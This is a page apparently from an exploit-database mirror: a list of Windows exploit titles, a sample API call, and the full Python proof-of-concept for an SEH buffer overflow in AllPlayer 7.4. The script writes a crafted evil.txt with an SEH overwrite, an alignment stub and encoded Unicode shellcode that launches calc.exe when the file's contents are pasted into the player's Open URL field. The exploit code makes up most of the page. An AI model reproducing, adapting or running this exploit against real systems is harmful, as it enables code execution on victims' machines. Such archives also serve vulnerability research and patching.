Menu

Improved exploit search engine. Try it out

"AllPlayer 7.4 - SEH Buffer Overflow (Unicode)"

Author

"Chris Au"

Platform

windows

Release date

2019-04-08

Release Date Title Type Platform Author
2019-06-21 "EA Origin < 10.5.38 - Remote Code Execution" remote windows "Dominik Penner"
2019-06-20 "Tuneclone 2.20 - Local SEH Buffer Overflow" local windows Achilles
2019-06-17 "Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)" local windows Gushmazuko
2019-06-17 "HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write" dos windows hyp3rlinx
2019-06-14 "Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow" local windows "Nipun Jaswal"
2019-06-13 "Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation" local windows PovlTekstTV
2019-06-11 "ProShow 9.0.3797 - Local Privilege Escalation" local windows Yonatan_Correa
2019-06-05 "IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2019-06-07 "Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)" local windows SandboxEscaper
2019-06-03 "Nvidia GeForce Experience Web Helper - Command Injection" local windows "Rhino Security Labs"
2019-06-04 "DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)" local windows "Kevin Randall"
2014-11-24 "Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)" local windows anonymous
2019-05-30 "Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service" dos windows n1xbyte
2019-05-28 "Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass" remote windows "Faudhzan Rahman"
2019-05-23 "Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)" local windows SandboxEscaper
2019-05-29 "Free SMTP Server 2.5 - Denial of Service (PoC)" dos windows "Metin Yunus Kandemir"
2019-05-27 "Pidgin 2.13.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
Release Date Title Type Platform Author
2019-04-08 "River Past Cam Do 3.7.6 - 'Activation Code' Local Buffer Overflow" local windows "Chris Au"
2019-04-08 "AllPlayer 7.4 - SEH Buffer Overflow (Unicode)" local windows "Chris Au"
2019-04-08 "FlexHEX 2.71 - SEH Buffer Overflow (Unicode)" local windows "Chris Au"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46668/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46668/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46668/41110/allplayer-74-seh-buffer-overflow-unicode/download/", "exploit_id": "46668", "exploit_description": "\"AllPlayer 7.4 - SEH Buffer Overflow (Unicode)\"", "exploit_date": "2019-04-08", "exploit_author": "\"Chris Au\"", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
# Date: 07-04-2019
# Vulnerable Software: AllPlayer V7.4
# Vendor Homepage: https://www.allplayer.org/
# Version: 7.4
# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe
# Tested Windows Windows 7 SP1 x86
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open AllPlayer
# 3. select "Open video or audio file", click "Open URL"
# 4. paste contents from clipboard
# 5. select OK
# 6. calc.exe
#

filename="evil.txt"
header = "http://"
junk = "\xcc" * 301
nseh = "\x90\x45"
seh = "\x7a\x74" #pop pop retn
valign = (
"\x55" #push ebp
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x18\x11" #sub eax,11001900
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\xcc" * 115
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()